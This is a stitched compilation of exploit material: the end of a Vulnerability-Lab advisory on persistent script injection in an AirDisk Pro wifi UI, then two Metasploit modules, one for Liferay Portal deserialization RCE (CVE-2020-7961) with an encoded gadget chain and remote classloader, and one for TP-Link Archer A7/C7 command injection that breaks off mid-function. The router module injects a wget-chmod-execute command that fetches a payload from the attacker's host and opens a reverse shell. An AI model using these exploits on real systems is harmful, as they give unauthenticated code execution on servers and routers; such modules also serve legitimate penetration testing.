deleteFile=New Folder&ID=New Folder&submitButton=Delete
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4699


Note: Comes up when somebody tries to delete the malicious injected path.


3. Devicename


PoC: Vulnerable Source
<div id="headerWraper">
<table border="0" cellspacing="0" cellpadding="0" width="100%">
<tr>
<td><a href="./"><img src="/webroot/webicon.png" id="headerImg"
width="57" height="57"/></a></td>
<td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td>  
</tr>
</table>
</div>


--- PoC Session logs [GET] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4612

Note: Executes each time the wifi sharing ui service of airdisk pro is
opened by the local or remote users.


Solution - Fix & Patch:
=======================
1. Disallow special chars in the folder and filenames. Sanitize all
inputs and filter all involved parameters to  prevent application-side
attacks.
2. Parse the output location of the popup permission message content to
prevent further executions after injects via post method.
3. Sanitize the devicename displayed on top of the wifi user interaction
by a secure parsing mechanism.


Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the application functions are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
'Description'    => %q{
        This module exploits a Java unmarshalling vulnerability via JSONWS in
        Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
        to execute code as the Liferay user. Tested against 7.2.0 GA1.
      },
'Author'         => [
'Markus Wulftange', # Discovery
'Thomas Etrillard', # PoC
'wvu'               # Module
      ],
'References'     => [
        ['CVE', '2020-7961'],
        ['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'],
        ['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'],
        ['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271']
      ],
'DisclosureDate' => '2019-11-25', # Vendor advisory
'License'        => MSF_LICENSE,
'Platform'       => 'java',
'Arch'           => ARCH_JAVA,
'Privileged'     => false,
'Targets'        => [
        ['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}]
      ],
'DefaultTarget'  => 0,
'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'},
'Notes'          => {
'Stability'    => [CRASH_SAFE],
'Reliability'  => [REPEATABLE_SESSION],
'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    # GET / response contains a Liferay-Portal header with version information
    res = send_request_cgi(
'method' => 'GET',
'uri'    => normalize_uri(target_uri.path)
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.headers['Liferay-Portal']
      return CheckCode::Unknown(
'Target did not respond with Liferay-Portal header.'
      )
    end

=begin
    Building the Liferay-Portal header:
      https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
    Liferay-Portal header data:
      https://github.com/liferay/liferay-portal/blob/master/release.properties

    Example GET / response:
      HTTP/1.1 200
      [snip]
      Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
      [snip]
=end
    version, build = res.headers['Liferay-Portal'].scan(
      /^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/
    ).flatten

    unless version && (build = Integer(build) rescue nil)
      return CheckCode::Detected(
'Target did not respond with Liferay version and build.'
      )
    end

    # XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
    if build < 7201
      return CheckCode::Appears(
"Liferay #{version} MAY be a vulnerable version. Please verify."
      )
    end

    CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # Start our HTTP server to provide remote classloading
    @classloader_uri = start_service

    unless @classloader_uri
      fail_with(Failure::BadConfig, 'Could not start remote classloader server')
    end

    print_good("Started remote classloader server at #{@classloader_uri}")

    # Send our remote classloader gadget to the target, triggering the vuln
    send_request_gadget(
      normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'),
      # Required POST parameters for /api/jsonws/expandocolumn/update-column:
      # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
'columnId' => rand(8..42), # Randomize for "evasion"
'name'     => rand(8..42), # Randomize for "evasion"
'type'     => rand(8..42)  # Randomize for "evasion"
    )
  end

  # Convenience method to send our gadget to a URI with desired POST params
  def send_request_gadget(uri, vars_post = {})
    print_status("Sending remote classloader gadget to #{full_uri(uri)}")

    vars_post['+defaultData'] =
'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'

    vars_post['defaultData.userOverridesAsString'] =
"HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"

    send_request_cgi({
'method'    => 'POST',
'uri'       => uri,
'vars_post' => vars_post
    }, 0)
  end

  # Generate all marshalsec payloads for the Jackson marshaller:
  # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
  def go_go_gadget
    # Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget:
    # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
    gadget = Rex::Text.decode_base64(
<<~EOF
        rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
        cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
        bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
        ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
        bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
        DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
        aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
        AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
        ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
        kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ=
      EOF
    )

    # Replace length-prefixed placeholder strings with our own
    gadget.sub!("\x00\x04HACK",  packed_class_name)
    gadget.sub!("\x00\x03THE",   packed_classloader_uri)
    gadget.sub("\x00\x06PLANET", packed_class_name)
  end

  # Convenience method to pack the classloader URI as a length-prefixed string
  def packed_classloader_uri
"#{[@classloader_uri.length].pack('n')}#{@classloader_uri}"
  end

end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'openssl'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
'Name'           => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution',
'Description'    => %q{
        This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on
        the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.
        The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
        not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command
        as root, including downloading and executing a binary from another host.
        This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
        Radek Domanski).
        },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Pedro Ribeiro <pedrib[at]gmail.com>',             # Vulnerability discovery and Metasploit module
'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro'     # Vulnerability discovery and Metasploit module
        ],
'References'     =>
          [
            [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'],
            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'],
            [ 'CVE', '2020-10882'],
            [ 'CVE', '2020-10883'],
            [ 'CVE', '2020-10884'],
            [ 'ZDI', '20-334'],
            [ 'ZDI', '20-335'],
            [ 'ZDI', '20-336' ]
          ],
'Privileged'     => true,
'Platform' => 'linux',
'Arch'     => ARCH_MIPSBE,
'Payload'        => {},
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' =>
          {
'PAYLOAD'   => 'linux/mipsbe/shell_reverse_tcp',
'WfsDelay'  => 15,
          },
'Targets'        =>
          [
            [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)',{} ]
          ],
'DisclosureDate' => "Mar 25 2020",
'DefaultTarget'   => 0,
      )
    )
    register_options(
      [
        Opt::RPORT(20002)
      ])

    register_advanced_options(
      [
        OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15])
      ])
  end

  def check
    begin
      res = send_request_cgi({
'uri'     => '/webpages/app.1564127413977.manifest',
'method'  => 'GET',
'rport'   => 80
      })

      if res && res.code == 200
        return Exploit::CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      pass
    end
    return Exploit::CheckCode::Unknown
  end

  def calc_checksum(packet)
    # reference table used to calculate the packet checksum
    # used by tdpd_pkt_calc_checksum (0x4037f0)
    # located at offset 0x0416e90 in the binary
    reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee,
    0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4,
    0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 0x88, 0x32, 0x79,
    0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6, 0x4c,
    0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d,
    0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41,
    0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83,
    0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9,
    0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa,
    0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10,
    0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b,
    0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8,
    0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32,
    0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d,
    0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf,
    0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95,
    0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6,
    0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c,
    0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01,
    0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 0xb1, 0x85,
    0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78,
    0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98,
    0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6,
    0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30,
    0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82,
    0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9,
    0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15,
    0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65, 0x4d, 0xb2, 0x61,
    0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a,
    0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4,
    0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda,
    0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c,
    0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe,
    0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85,
    0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29,
    0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d,
    0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed,
    0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2,
    0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73,
    0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a,
    0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a,
    0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3,
    0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80,
    0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b,
    0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9,
    0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e,
    0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f,
    0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06,
    0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36,
    0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf,
    0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc,
    0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77,
    0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5,
    0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a,
    0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b,
    0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3,
    0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72,
    0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a,
    0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5,
    0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2,
    0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81,
    0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47,
    0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11,
    0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff,
    0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e,
    0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16,
    0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9,
    0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae,
    0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd,
    0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3,
    0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23,
    0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b,
    0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a,
    0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d]

    res = 0xffffffff

    # main checksum calculation
    packet.each_entry { |c|
      index = ((c ^ res) & 0xff) * 4
      # .reverse is needed as the target is big endian
      ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first)
      res = ref ^ (res >> 8)
    }

    checksum = ~res
    checksum_s = [(checksum)].pack('I>').force_encoding("ascii")

    # convert back to string
    packet = packet.pack('C*').force_encoding('ascii')

    # and replace the checksum
    packet[12] = checksum_s[0]
    packet[13] = checksum_s[1]
    packet[14] = checksum_s[2]
    packet[15] = checksum_s[3]

    packet
  end

  def aes_encrypt(plaintext)
    # Function encrypts perfectly 16 bytes aligned payload

    if (plaintext.length % 16 != 0)
      return
    end

    cipher = OpenSSL::Cipher.new 'AES-128-CBC'
    # in the original C code the key and IV are 256 bits long... but they still use AES-128
    iv = "1234567890abcdef"
    key = "TPONEMESH_Kf!xn?"
    encrypted = ''
    cipher.encrypt
    cipher.iv = iv
    cipher.key = key

    # Take each 16 bytes block and encrypt it
    plaintext.scan(/.{1,16}/) { |block|
      encrypted += cipher.update(block)
    }

    encrypted
  end

  def create_injection(c)
    # Template for the command injection
    # The injection happens at "slave_mac" (read advisory for details)
    # The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions.

    # This will fail if we send a command with single quotes (')
    # ... but that's not a problem for this module, since we don't use them for our command.
    # It might also fail with double quotes (") since this will break the JSON...
    inject = "\';printf \'#{c}\'>>#{@cmd_file}\'"

    template = "{\"method\":\"slave_key_offer\",\"data\":{"\
"\"group_id\":\"#{rand_text_numeric(1..3)}\","\
"\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\
"\"slave_mac\":\"%{INJECTION}\","\
"\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\
"\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\
"\"want_to_join\":false,"\
"\"model\":\"#{rand_text_alpha(5..13)}\","\
"\"product_type\":\"#{rand_text_alpha(5..13)}\","\
"\"operation_mode\":\"A%{PADDING}\"}}"

    # This is required to calculate exact template length without replace flags
    template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length
    # This has to be initialized to cover the situation when no padding is needed
    pad = ''
    padding = rand_text_alpha(16)

    template_len += inject.length

    # Calculate pad if padding is needed
    if (template_len % 16 != 0)
      pad = padding[0..15-(template_len % 16)]
    end

    # Here the final payload is created
    template % {INJECTION:"#{inject}", PADDING:"#{pad}"}
  end

  def update_len_field(packet, payload_length)
    new_packet = packet[0..3]
    new_packet += [payload_length].pack("S>")
    new_packet += packet[6..-1]
  end

  def exec_cmd_file(packet)
    # This function handles special action of exec
    # Returns new complete tpdp packet
    inject = "\';sh #{@cmd_file}\'"
    payload = create_injection(inject)

    ciphertext = aes_encrypt(payload)
    if not ciphertext
      fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
    end

    new_packet = packet[0..15]
    new_packet += ciphertext
    new_packet = update_len_field(new_packet, ciphertext.length)

    calc_checksum(new_packet.bytes)
  end

  # Handle incoming requests from the router
  def on_request_uri(cli, request)
    print_good("#{peer} - Sending executable to the router")
    print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
    send_response(cli, @payload_exe)
    @payload_sent = true
  end

  def exploit
    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
      fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
    end

    if datastore['SSL']
      fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it")
    end

    print_status("Attempting to exploit #{target.name}")

    tpdp_packet_template =
      [0x01].pack('C*') +       # packet version, fixed to 1
      [0xf0].pack('C*') +       # set packet type to 0xf0 (onemesh)
      [0x07].pack('S>*') +      # onemesh opcode, used by the onemesh_main switch table
      [0x00].pack('S>*') +      # packet len
      [0x01].pack('C*') +       # some flag, has to be 1 to enter the vulnerable onemesh function
      [0x00].pack('C*') +       # dunno what this is
      [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') +  # serial number, can by any value
      [0x5A,0x6B,0x7C,0x8D].pack('C*')        # Checksum placeholder

    srv_host = datastore['SRVHOST']
    srv_port = datastore['SRVPORT']
    @cmd_file = rand_text_alpha_lower(1)

    # generate our payload executable
    @payload_exe = generate_payload_exe

    # Command that will download @payload_exe and execute it
    download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"

    http_service = 'http://' + srv_host + ':' + srv_port.to_s
    print_status("Starting up our web service on #{http_service} ...")
    start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
'Path' => "/#{@cmd_file}"
    }})

    print_status("#{peer} - Connecting to the target")
    connect_udp

    print_status("#{peer} - Sending command file byte by byte")
    print_status("#{peer} - Command: #{download_cmd}")
    mod = download_cmd.length / 5

    download_cmd.each_char.with_index { |c, index|
      # Generate payload
      payload = create_injection(c)
      if not payload
        fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!")
      end

      # Encrypt payload
      ciphertext = aes_encrypt(payload)
      if not ciphertext
        fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
      end

      tpdp_packet = tpdp_packet_template.dup
      tpdp_packet += ciphertext
